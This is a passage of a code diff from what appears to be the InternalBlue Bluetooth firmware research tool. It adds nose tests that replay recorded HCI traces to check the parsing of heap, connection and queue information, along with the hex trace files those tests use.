2235440: 2235484,
2235704: 2235748,
2235792: 2235836,
2235220: 2235264,
2235748: 2235792,
2235352: 2235396,
2235572: 2235616,
2235836: 0,
2235484: 2235528
},
'capacity': 15,
'address': 2157624,
'next': 2157672,
'memory_size': 660,
'waitlist_length': 0,
'buffer_list': 2235220,
'memory': 2235220,
'buffer_size': 40,
'prev': 2121304,
'list_length': 15,
'thread_waitlist': 0
},
{
'index': 6,
'buffer_headers': {
2236096: 2236132,
2236240: 2236276,
2236132: 2236168,
2236384: 0,
2235880: 2235916,
2236204: 2236240,
2236348: 2236384,
2235916: 2235952,
2235952: 2235988,
2236168: 2236204,
2236312: 2236348,
2235988: 2236024,
2236024: 2236060,
2236276: 2236312,
2236060: 2236096
},
'capacity': 15,
'address': 2157672,
'next': 2121160,
'memory_size': 540,
'waitlist_length': 0,
'buffer_list': 2235880,
'memory': 2235880,
'buffer_size': 32,
'prev': 2157624,
'list_length': 15,
'thread_waitlist': 0
}]
trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'traces/adbcore/dictionary_tests/info_heap_old.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [ADBCore(log_level='info', data_directory=data_directory, replay=True)]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readHeapInformation()
print(information)
nose.tools.assert_equal(information, dummy)
reference.shutdown()
tests/test_info_conn_7.py
+52
View File
@@ -0,0 +1,52 @@
from __future__ import print_function
from internalblue.cli import _parse_argv
from internalblue.adbcore import ADBCore
from internalblue.objects.connection_information import ConnectionInformation
import os
import nose
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple
from internalblue import DeviceTuple
except ImportError:
pass
def test_info_conn_7():
dummy = ConnectionInformation(7, bytearray.fromhex('0023023a1a2e'), 0, True, 0xc,
bytearray.fromhex('e98a5eaaff39ecb5ce4447590dfb73a4'), 16,
bytearray.fromhex('dbea2d9c47bc1aa6afe664ff31591aa6'), -87,
bytearray.fromhex('0a00c821ffff8ffa'), bytearray.fromhex('9bff598701000000'),
bytearray.fromhex('00'))
trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'traces/adbcore/dictionary_tests/info_conn_7.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [ADBCore(log_level='info', data_directory=data_directory, replay=True)]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readConnectionInformation(7)
print(information)
nose.tools.assert_dict_equal(vars(information), vars(dummy))
reference.shutdown()
tests/test_info_conn_9.py
+50
View File
@@ -0,0 +1,50 @@
from __future__ import print_function
from internalblue.cli import _parse_argv
from internalblue.adbcore import ADBCore
from internalblue.objects.connection_information import ConnectionInformation
import os
import nose
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple
except ImportError:
pass
def test_info_conn_9():
dummy = ConnectionInformation(9, bytearray.fromhex('000000000000'), 0, False, 12,
bytearray.fromhex('00000000000000000000000000000000'), 0, b'', -87,
bytearray.fromhex('0000000000000000'),
bytearray.fromhex('0000000000000000'), bytearray.fromhex('00'))
trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'traces/adbcore/dictionary_tests/info_conn_9.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [ADBCore(log_level='info', data_directory=data_directory, replay=True)]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readConnectionInformation(9)
print(information)
nose.tools.assert_dict_equal(vars(information), vars(dummy))
reference.shutdown()
tests/test_queue.py
+63
View File
@@ -0,0 +1,63 @@
from __future__ import print_function
from internalblue.cli import _parse_argv
from internalblue.adbcore import ADBCore
from internalblue.objects.queue_element import QueueElement
import os
import nose
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple
except ImportError:
pass
def test_info_queue():
dummy = [
QueueElement(0, 2123152, 4, 16, 0, 16, 2123208, 2123272, 2123268, 2123268, 0, 0, 2123332, 2141676, 'tran_HCIEvent'),
QueueElement(1, 2123332, 8, 31, 0, 31, 2123388, 2123636, 2123436, 2123436, 0, 0, 2123636, 2123152, 'tran_ACLData'),
QueueElement(2, 2123636, 4, 3, 0, 3, 2123692, 2123704, 2123692, 2123692, 0, 0, 2123704, 2123332, 'tran_SCOData'),
QueueElement(3, 2123704, 4, 31, 0, 31, 2123760, 2123884, 2123760, 2123760, 0, 0, 2123884, 2123636, 'tran_UartBridgeNonHCIEvent'),
QueueElement(4, 2123884, 4, 20, 0, 20, 2123940, 2124020, 2124000, 2124000, 0, 0, 2124020, 2123704, 'tran_DiagData'),
QueueElement(5, 2124020, 8, 8, 0, 8, 2124076, 2124140, 2124076, 2124076, 0, 0, 2124140, 2123884, 'tran_HIDUsbKBEvt'),
QueueElement(6, 2124140, 8, 6, 0, 6, 2124196, 2124244, 2124196, 2124196, 0, 0, 2124244, 2124020, 'tran_HIDUsbMSEvt'),
QueueElement(7, 2124244, 8, 1, 0, 1, 2100496, 2100504, 2100496, 2100496, 0, 0, 2124300, 2124140, 'tran_HIDUsbMSCtrl'),
QueueElement(8, 2124300, 8, 1, 0, 1, 2100504, 2100512, 2100504, 2100504, 0, 0, 2124356, 2124244, 'tran_HIDUsbKBCtrl'),
QueueElement(9, 2124356, 8, 32, 0, 32, 2124412, 2124668, 2124412, 2124412, 0, 0, 2110352, 2124300, 'tran_HidAuxData'),
QueueElement(10, 2110352, 8, 12, 0, 12, 2192284, 2192380, 2192300, 2192300, 0, 0, 2120560, 2124356, 'lm_Cmd'),
QueueElement(11, 2120560, 4, 8, 0, 8, 2192380, 2192412, 2192400, 2192400, 0, 0, 2110408, 2110352, 'hci_HciCommand'),
QueueElement(12, 2110408, 8, 19, 0, 19, 2192412, 2192564, 2192412, 2192412, 0, 0, 2118068, 2120560, 'lm_deferredAction'),
QueueElement(13, 2118068, 8, 6, 0, 6, 2192564, 2192612, 2192564, 2192564, 0, 0, 2141588, 2110408, 'lrmmsm_cmd'),
QueueElement(14, 2141588, 4, 8, 0, 8, 2141644, 2141676, 2141644, 2141644, 0, 0, 2141676, 2118068, 'liteHostEvent'),
QueueElement(15, 2141676, 4, 16, 0, 16, 2141732, 2141796, 2141732, 2141732, 0, 0, 2123152, 2141588, 'litehostRcvdL2capData')
]
trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'traces/adbcore/dictionary_tests/info_queue.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [ADBCore(log_level='info', data_directory=data_directory, replay=True)]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readQueueInformation()
print(information)
nose.tools.assert_equal([vars(element) for element in information], [vars(element) for element in dummy])
reference.shutdown()
tests/traces/__init__.py
+63
View File
@@ -0,0 +1,63 @@
from __future__ import print_function
from __future__ import absolute_import
from .testwrapper import trace_test, get_trace_path_cmd_tuple
import os
tracedir = os.path.dirname(__file__)
#cores = ['macoscore', 'ioscore', 'adbcore', 'hcicore']
import unittest
def generate_test_suite_from_traces():
def generate_test_from_file(core, tracefile):
tracepath, cmd = get_trace_path_cmd_tuple(core, tracefile)
def test():
print("Running test %s " % (tracefile[:-6]))
trace_test(core, tracepath, cmd)
# Rename the function to the tracefile name without .trace suffix
test.__name__ = tracefile[:-6]
if cmd:
return test
else:
return unittest.skip("No command specified in trace {}".format(tracepath))(test)
suite = unittest.TestSuite()
for core in os.listdir(tracedir):
if os.path.isdir(os.path.join(tracedir,core)):
core_suite = unittest.TestSuite()
for tracefile in os.listdir(os.path.join(tracedir, core)):
if tracefile.endswith(".trace"):
core_suite.addTest(
unittest.FunctionTestCase(generate_test_from_file(core, tracefile), description=tracefile))
suite.addTest(core_suite)
return suite
# test_all_traces()
def load_tests(loader, standard_tests, n):
"""
This method is called by test frameworks to supply a testsuite instead of the test framework collecting them itself.
This allows use to automatically generate a proper test for each trace in the subdirectory that has a command specified.
Those tests are then run by the framework in the usual way which integrates with IDEs
TODO: Document PyCharm Setup
"""
trace_suite = generate_test_suite_from_traces()
return trace_suite
if __name__ == '__main__':
suite = generate_test_suite_from_traces()
unittest.TextTestRunner().run(suite)
tests/traces/adbcore/.gitkeep
View File
tests/traces/adbcore/dictionary_tests/info_conn_7.trace
+21
View File
@@ -0,0 +1,21 @@
TX 010300011000
RX 0000000400000004000000020000000000e26b46e2c309cc
RX 01011000
RX 0000000f0000000f000000030000000000e26b46e2c3274f
RX 04
RX 0e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc05b0402000fb
RX 000000090000000900000002
RX 0000000000e26b46e2d06c12
RX 014dfc05b0402000fb
RX 0000010200000102000000030000000000e26b46
RX e2d093f7
RX 040eff014dfc0007000000000000000000000000000007000000000000000000007711572d980700000000000010002e1a3a022300feb10a00c821ffff8ffa9bff59870100000000000000000000000000000000000000000000000000008d0500fa0a401f0000401f00000c001adddbea2d9c47bc1aa6afe664ff31591aa6e98a5eaaff39ecb5ce4447590dfb73a4161203cd6e77be6a4bcfb3ee52d3e2c40000000028000404000000130000001000000000020001003c002003001800009c7e1200b00402000200000002000101010200000000000000000000ffffffffffffffff0000000100000000000005f8ff001add0020000000000015d1000000000000
TX 0108004dfc05ab41200051
RX 000000090000000900000002
RX 0000000000e26b46e2d18faa
RX 014dfc05ab41200051
RX 0000005800000058000000030000000000e26b46e2d1ade2
RX 040e55014dfc000000000000000000000000000000000000a4000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000400000001000000
Socket closed
tests/traces/adbcore/dictionary_tests/info_conn_9.trace
+24
View File
@@ -0,0 +1,24 @@
#info connections
TX 010300011000
RX 0000000400000004000000020000000000e269c211af9287
RX 01011000
RX 0000000f0000000f000000030000000000e269c211afc606
RX 040e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc0548432000fb
RX 0000000900000009000000020000000000e269c2
RX 11cde3be
RX 014dfc0548432000fb
RX 00000102
RX 000001020000000300000000
RX 00e269c211ce175c
RX 04
RX 0eff014dfc000900000000000000000000000000000000000000000000000000777700c91000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005000000007d0000007d00000c001eff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002800000000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff0000000100000000000000f0ff0000000000000000000001c4000000000000
TX 0108004dfc054344200051
RX 0000000900000009000000020000000000e269c2
RX 11cf5a52
RX 014dfc054344200051
RX 000000580000005800000003
RX 0000000000e269c211cf8917
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Socket closed
tests/traces/adbcore/dictionary_tests/info_heap_old.trace
+685
View File
@@ -0,0 +1,685 @@
# info heap
TX 010300011000
RX 0000000400000004000000020000000000e269c200a6dc56
RX 01011000
RX 0000000f0000000f000000030000000000e269c2
RX 00a717ec
RX 04
RX 0e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc059430200004
RX 000000030000000300000003
RX 0000000000e269c200a87965
RX 07f001
RX 00000009000000090000000200000000
RX 00e269c200a8e193
RX 01
RX 4dfc059430200004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00a918e2
RX 040e08014dfc00c85d2000
TX 0108004dfc05c85d200030
RX 000000090000000900000002
RX 0000000000e269c200aab793
RX 014dfc05c85d200030
RX 00000037
RX 000000370000000300000000
RX 00e269c200aaf0ec
RX 04
RX 0e34014dfc00434f4c42000000000700000008000000a4792100a479210020010000200000000000000000000000f85d200068ec2000
TX 0108004dfc05a479210004
RX 000000090000000900000002
RX 0000000000e269c200acb1ba
RX 014dfc05a479210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200ace5c2
RX 04
RX 0e08014dfc00c85d2000
TX 0108004dfc05c879210004
RX 000000090000000900000002
RX 0000000000e269c200ae2501
RX 014dfc05c879210004
RX 0000000b0000000b0000000300000000
RX 00e269c200ae5915
RX 04
RX 0e08014dfc00587a2100
TX 0108004dfc05ec79210004
RX 0000000900000009000000020000000000e269c200b01eae
RX 01
RX 4dfc05ec79210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200b04d6c
RX 04
RX 0e08014dfc007c7a2100
TX 0108004dfc05107a210004
RX 0000000900000009000000020000000000e269c200b19061
RX 014dfc05107a210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200b1c4f3
RX 04
RX 0e08014dfc00c8792100
TX 0108004dfc05347a210004
RX 0000000900000009000000020000000000e269c200b38d00
RX 01
RX 4dfc05347a210004
RX 0000000b0000000b
RX 000000030000000000e269c200b3bbaa
RX 040e08014dfc00c85d2000
TX 0108004dfc05587a210004
RX 0000000900000009000000020000000000e269c200b58252
RX 014dfc05587a210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00b5b18b
RX 040e08014dfc00ec792100
TX 0108004dfc057c7a210004
RX 0000000900000009000000020000000000e269c200b6f455
RX 014dfc057c7a210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00b728c4
RX 040e08014dfc00a07a2100
TX 0108004dfc05a07a210004
RX 000000090000000900000002
RX 0000000000e269c200b8f1d6
RX 014dfc05a07a210004
RX 0000000b0000000b000000030000000000e269c2
RX 00b92612
RX 040e08014dfc0000000000
TX 0108004dfc05f85d200030
RX 0000000900000009
RX 000000020000000000e269c2
RX 00ba65be
RX 014dfc05f85d200030
RX 00000037000000370000000300000000
RX 00e269c200ba9b76
RX 04
RX 0e34014dfc00434f4c42000000000700000008000000087b2100c47a210020020000400000000000000000000000285e2000c85d2000
TX 0108004dfc05c47a210004
RX 000000090000000900000002
RX 0000000000e269c200bc6390
RX 014dfc05c47a210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00bc987e
RX 04
RX 0e08014dfc00087b2100
TX 0108004dfc05087b210004
RX 0000000900000009000000020000000000e269c2
RX 00bdd708
RX 014dfc05087b210004
RX 0000000b0000000b0000000300000000
RX 00e269c200be075f
RX 04
RX 0e08014dfc004c7b2100
TX 0108004dfc054c7b210004
RX 0000000900000009000000020000000000e269c200bfd07f
RX 014dfc054c7b210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00bfffe2
RX 040e08014dfc00907b2100
TX 0108004dfc05907b210004
RX 000000090000000900000002
RX 0000000000e269c200c1c264
RX 014dfc05907b210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00c1fba1
RX 040e08014dfc00d47b2100
TX 0108004dfc05d47b210004
RX 000000090000000900000002
RX 0000000000e269c200c339f3
RX 014dfc05d47b210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00c36f64
RX 040e08014dfc00187c2100
TX 0108004dfc05187c210004
RX 0000000900000009000000020000000000e269c200c53386
RX 014dfc05187c210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00c56249
RX 040e08014dfc005c7c2100
TX 0108004dfc055c7c210004
RX 0000000900000009000000020000000000e269c2
RX 00c6a64c
RX 014dfc055c7c210004
RX 0000000b0000000b0000000300000000
RX 00e269c200c6d51e
RX 04
RX 0e08014dfc00a07c2100
TX 0108004dfc05a07c210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00c8a176
RX 014dfc05a07c210004
RX 0000000b0000000b0000000300000000
RX 00e269c200c8daef
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc05285e200030
RX 0000000900000009
RX 000000020000000000e269c2
RX 00ca1661
RX 014dfc05285e200030
RX 000000370000003700000003
RX 0000000000e269c200ca4c0b
RX 040e34014dfc00434f4c42000000000a0000000a000000e47c2100e47c2100780a0000080100000000000000000000885e2000f85d2000
TX 0108004dfc05e47c210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00cc13aa
RX 014dfc05e47c210004
RX 0000000b0000000b0000000300000000
RX 00e269c200cc49c8
RX 04
RX 0e08014dfc00f07d2100
TX 0108004dfc05f07d210004
RX 00000009000000090000000200000000
RX 00e269c200ce084a
RX 014dfc05f07d210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00ce3d02
RX 040e08014dfc00fc7e2100
TX 0108004dfc05fc7e210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00cf7abc
RX 014dfc05fc7e210004
RX 0000000b0000000b0000000300000000
RX 00e269c200cfafff
RX 04
RX 0e08014dfc0008802100
TX 0108004dfc050880210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00d1718e
RX 014dfc050880210004
RX 0000000b0000000b0000000300000000
RX 00e269c200d1ad02
RX 040e08014dfc0014812100
TX 0108004dfc051481210004
RX 0000000900000009000000020000000000e269c200d2e49d
RX 01
RX 4dfc051481210004
RX 0000000b0000000b
RX 000000030000000000e269c200d313fc
RX 040e08014dfc0020822100
TX 0108004dfc052082210004
RX 0000000900000009000000020000000000e269c2
RX 00d4dfc6
RX 014dfc052082210004
RX 0000000b0000000b00000003
RX 0000000000e269c200d50e59
RX 040e08014dfc002c832100
TX 0108004dfc052c83210004
RX 00000009000000090000000200000000
RX 00e269c200d65308
RX 01
RX 4dfc052c83210004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00d68806
RX 040e08014dfc0038842100
TX 0108004dfc053884210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00d84aba
RX 014dfc053884210004
RX 0000000b0000000b00000003
RX 0000000000e269c200d88584
RX 040e08014dfc0044852100
TX 0108004dfc054485210004
RX 0000000900000009000000020000000000e269c2
RX 00da42d6
RX 014dfc054485210004
RX 0000000b0000000b00000003
RX 0000000000e269c200da7651
RX 040e08014dfc0050862100
TX 0108004dfc055086210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00dbba9e
RX 014dfc055086210004
RX 0000000b0000000b00000003
RX 0000000000e269c200dbf538
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc05885e200030
RX 00000009000000090000000200000000
RX 00e269c200ddb037
RX 01
RX 4dfc05885e200030
RX 000000370000003700000003
RX 0000000000e269c200dde9b6
RX 040e34014dfc00434f4c4200000000040000000400000024c6210024c62100b0100000280400000000000000000000585e2000285e2000
TX 0108004dfc0524c6210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00df268a
RX 014dfc0524c6210004
RX 0000000b0000000b0000000300000000
RX 00e269c200df5cd7
RX 040e08014dfc0050ca2100
TX 0108004dfc0550ca210004
RX 0000000900000009000000020000000000e269c2
RX 00e11eb6
RX 01
RX 4dfc0550ca210004
RX 0000000b0000000b00000003
RX 0000000000e269c200e15819
RX 040e08014dfc007cce2100
TX 0108004dfc057cce210004
RX 00000009000000090000000200000000
RX 00e269c200e29334
RX 01
RX 4dfc057cce210004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00e2c73e
RX 040e08014dfc00a8d22100
TX 0108004dfc05a8d2210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00e4925e
RX 014dfc05a8d2210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200e4c673
RX 040e08014dfc0000000000
TX 0108004dfc05585e200030
RX 0000000900000009
RX 000000020000000000e269c2
RX 00e5ff65
RX 014dfc05585e200030
RX 000000370000003700000003
RX 0000000000e269c200e63326
RX 040e34014dfc00434f4c42000000001000000010000000d4d62100d4d621008044000044040000000000000000000038ec2000885e2000
TX 0108004dfc05d4d6210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00e7fcce
RX 014dfc05d4d6210004
RX 0000000b0000000b0000000300000000
RX 00e269c200e8313f
RX 040e08014dfc001cdb2100
TX 0108004dfc051cdb210004
RX 0000000900000009000000020000000000e269c200e9f3c0
RX 014dfc051cdb210004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00ea223f
RX 040e08014dfc0064df2100
TX 0108004dfc0564df210004
RX 00000009000000090000000200000000
RX 00e269c200eb6947
RX 01
RX 4dfc0564df210004
RX 0000000b0000000b00000003
RX 0000000000e269c200eb9dc8
RX 04
RX 0e08014dfc00ace32100
TX 0108004dfc05ace3210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00ed6025
RX 014dfc05ace3210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00edb820
RX 040e08014dfc00f4e72100
TX 0108004dfc05f4e7210004
RX 00000009000000090000000200000000
RX 00e269c200eeaa84
RX 014dfc05f4e7210004
RX 0000000b0000000b000000030000000000e269c200eeb23c
RX 04
RX 0e08014dfc003cec2100
TX 0108004dfc053cec210004
RX 0000000900000009
RX 000000020000000000e269c200ef25f0
RX 01
RX 4dfc053cec210004
RX 0000000b
RX 0000000b000000030000000000e269c200ef2e26
RX 04
RX 0e08014dfc0084f02100
TX 0108004dfc0584f0210004
RX 0000000900000009000000020000000000e269c200efa285
RX 014dfc0584f0210004
RX 0000000b
RX 0000000b000000030000000000e269c200efa979
RX 040e08014dfc00ccf42100
TX 0108004dfc05ccf4210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00f0207c
RX 014dfc05ccf4210004
RX 0000000b0000000b0000000300000000
RX 00e269c200f028c8
RX 04
RX 0e08014dfc0014f92100
TX 0108004dfc0514f9210004
RX 0000000900000009000000020000000000e269c200f0b8fd
RX 014dfc0514f9210004
RX 0000000b0000000b0000000300000000
RX 00e269c200f0bf4a
RX 040e08014dfc005cfd2100
TX 0108004dfc055cfd210004
RX 00000009000000090000000200000000
RX 00e269c200f11c7d
RX 01
RX 4dfc055cfd210004
RX 0000000b0000000b00000003
RX 0000000000e269c200f12aa4
RX 040e08014dfc00a4012200
TX 0108004dfc05a401220004
RX 0000000900000009000000020000000000e269c200f1946c
RX 014dfc05a401220004
RX 0000000b0000000b00000003
RX 0000000000e269c200f19f40
RX 040e08014dfc00ec052200
TX 0108004dfc05ec05220004
RX 0000000900000009000000020000000000e269c200f20f44
RX 01
RX 4dfc05ec05220004
RX 0000000b0000000b00000003
RX 0000000000e269c200f21b6a
RX 04
RX 0e08014dfc00340a2200
TX 0108004dfc05340a220004
RX 0000000900000009000000020000000000e269c200f29be7
RX 014dfc05340a220004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00f2b3bd
RX 040e08014dfc007c0e2200
TX 0108004dfc057c0e220004
RX 00000009
RX 00000009
RX 0000000200000000
RX 00e269c200f3a7c6
RX 01
RX 4dfc057c0e220004
RX 0000000b0000000b000000030000000000e269c2
RX 00f4951f
RX 040e08014dfc00c4122200
TX 0108004dfc05c412220004
RX 0000000900000009
RX 000000020000000000e269c200f637e5
RX 014dfc05c412220004
RX 0000000b0000000b000000030000000000e269c200f63f91
RX 040e08014dfc000c172200
TX 0108004dfc050c17220004
RX 00000009
RX 000000090000000200000000
RX 00e269c200f6f156
RX 014dfc050c17220004
RX 0000000b0000000b0000000300000000
RX 00e269c200f6f966
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc0538ec200030
RX 00000009000000090000000200000000
RX 00e269c200f76de0
RX 014dfc0538ec200030
RX 0000003700000037000000030000000000e269c200f7757d
RX 040e34014dfc00434f4c42000000000f0000000f000000541b2200541b22009402000028000000000000000000000068ec2000585e2000
TX 0108004dfc05541b220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00f8133d
RX 014dfc05541b220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200f83a20
RX 04
RX 0e08014dfc00801b2200
TX 0108004dfc05801b220004
RX 0000000900000009000000020000000000e269c200f909ee
RX 014dfc05801b220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200f935e2
RX 04
RX 0e08014dfc00ac1b2200
TX 0108004dfc05ac1b220004
RX 0000000900000009000000020000000000e269c2
RX 00fb146c
RX 014dfc05ac1b220004
RX 0000000b
RX 0000000b00000003
RX 0000000000e269c200fb4327
RX 040e08014dfc00d81b2200
TX 0108004dfc05d81b220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00fd0682
RX 014dfc05d81b220004
RX 0000000b0000000b0000000300000000
RX 00e269c200fd3fca
RX 04
RX 0e08014dfc00041c2200
TX 0108004dfc05041c220004
RX 00000009000000090000000200000000
RX 00e269c200fe7d8e
RX 01
RX 4dfc05041c220004
RX 0000000b0000000b00000003
RX 0000000000e269c200feb0d4
RX 040e08014dfc00301c2200
TX 0108004dfc05301c220004
RX 0000000900000009000000020000000000e269c2
RX 010074cc
RX 014dfc05301c220004
RX 0000000b0000000b0000000300000000
RX 00e269c20100a76b
RX 04
RX 0e08014dfc005c1c2200
TX 0108004dfc055c1c220004
RX 0000000900000009000000020000000000e269c20101eacb
RX 014dfc055c1c220004
RX 0000000b0000000b0000000300000000
RX 00e269c201021779
RX 04
RX 0e08014dfc00881c2200
TX 0108004dfc05881c220004
RX 0000000900000009000000020000000000e269c20103e6c3
RX 014dfc05881c220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201041515
RX 04
RX 0e08014dfc00b41c2200
TX 0108004dfc05b41c220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 01055aa2
RX 014dfc05b41c220004
RX 0000000b0000000b0000000300000000
RX 00e269c201058f0e
RX 040e08014dfc00e01c2200
TX 0108004dfc05e01c220004
RX 000000090000000900000002
RX 0000000000e269c201075199
RX 014dfc05e01c220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201078a8c
RX 04
RX 0e08014dfc000c1d2200
TX 0108004dfc050c1d220004
RX 0000000900000009000000020000000000e269c2
RX 010948a2
RX 014dfc050c1d220004
RX 0000000b0000000b0000000300000000
RX 00e269c201097c0d
RX 04
RX 0e08014dfc00381d2200
TX 0108004dfc05381d220004
RX 0000000900000009
RX 000000020000000000e269c2010ac2b3
RX 014dfc05381d220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c2010afeef
RX 04
RX 0e08014dfc00641d2200
TX 0108004dfc05641d220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 010cbc41
RX 014dfc05641d220004
RX 0000000b0000000b00000003
RX 0000000000e269c2010cefe5
RX 040e08014dfc00901d2200
TX 0108004dfc05901d220004
RX 00000009000000090000000200000000
RX 00e269c2010e2df1
RX 01
RX 4dfc05901d220004
RX 0000000b0000000b00000003
RX 0000000000e269c2010e61ea
RX 040e08014dfc00bc1d2200
TX 0108004dfc05bc1d220004
RX 000000090000000900000002
RX 0000000000e269c20110231e
RX 014dfc05bc1d220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201105c92
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc0568ec200030
RX 0000000900000009000000020000000000e269c2
RX 01119816
RX 014dfc0568ec200030
RX 00000037000000370000000300000000
RX 00e269c20111c667
RX 04
RX 0e34014dfc00434f4c42000000000f0000000f000000e81d2200e81d22001c020000200000000000000000000000c85d200038ec2000
TX 0108004dfc05e81d220004
RX 00000009000000090000000200000000
RX 00e269c201138f25
RX 01
RX 4dfc05e81d220004
RX 0000000b0000000b
RX 000000030000000000e269c20113c768
RX 040e08014dfc000c1e2200
TX 0108004dfc050c1e220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 011507e7
RX 014dfc050c1e220004
RX 0000000b0000000b0000000300000000
RX 00e269c201153d26
RX 04
RX 0e08014dfc00301e2200
TX 0108004dfc05301e220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 0116fe0e
RX 014dfc05301e220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201173734
RX 04
RX 0e08014dfc00541e2200
TX 0108004dfc05541e220004
RX 0000000900000009000000020000000000e269c20118f296
RX 014dfc05541e220004
RX 0000000b0000000b
RX 000000030000000000e269c2011926ef
RX 040e08014dfc00781e2200
TX 0108004dfc05781e220004
RX 0000000900000009000000020000000000e269c2011a6bbe
RX 014dfc05781e220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c2011a9958
RX 04
RX 0e08014dfc009c1e2200
TX 0108004dfc059c1e220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 011c676b
RX 014dfc059c1e220004
RX 0000000b0000000b00000003
RX 0000000000e269c2011c9b6e
RX 040e08014dfc00c01e2200
TX 0108004dfc05c01e220004
RX 0000000900000009000000020000000000e269c2
RX 011dda94
RX 014dfc05c01e220004
RX 0000000b0000000b0000000300000000
RX 00e269c2011e0829
RX 04
RX 0e08014dfc00e41e2200
TX 0108004dfc05e41e220004
RX 0000000900000009000000020000000000e269c2011fd393
RX 014dfc05e41e220004
RX 0000000b0000000b
RX 0000000300000000
RX 00e269c201200234
RX 040e08014dfc00081f2200
TX 0108004dfc05081f220004
RX 0000000900000009000000020000000000e269c2
RX 012145f7
RX 014dfc05081f220004
RX 0000000b0000000b0000000300000000
RX 00e269c20121a431
RX 04
RX 0e08014dfc002c1f2200
TX 0108004dfc052c1f220004
RX 000000090000000900000002
RX 0000000000e269c201230eec
RX 014dfc052c1f220004
RX 0000000b0000000b0000000300000000
